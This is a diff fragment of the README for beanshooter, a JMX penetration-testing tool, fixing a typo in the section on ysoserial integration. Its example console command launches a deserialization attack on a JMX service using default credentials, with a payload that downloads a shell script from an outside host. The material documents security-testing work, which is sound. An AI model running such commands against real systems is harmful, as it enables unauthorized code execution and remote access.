qtc-de/beanshooter/README.md

 project can be integrated to *beanshooter* by specifying the path to the corresponding *ysoserial .jar* file.
 This can be configured either in the configuration file or by using the
 ``--yso`` command line option.
 The default location is ``/opt/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar``.

-With *ysoserial* setup correctly, one can attempt a deserialization attack agains the target:
+With *ysoserial* setup correctly, one can attempt a deserialization attack against the target:

 ```console
 [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 172.18.0.2 9010 ysoserial CommonsCollections6 "wget -O /dev/shm/s.pl http://172.18.0.1:8000/shell.pl"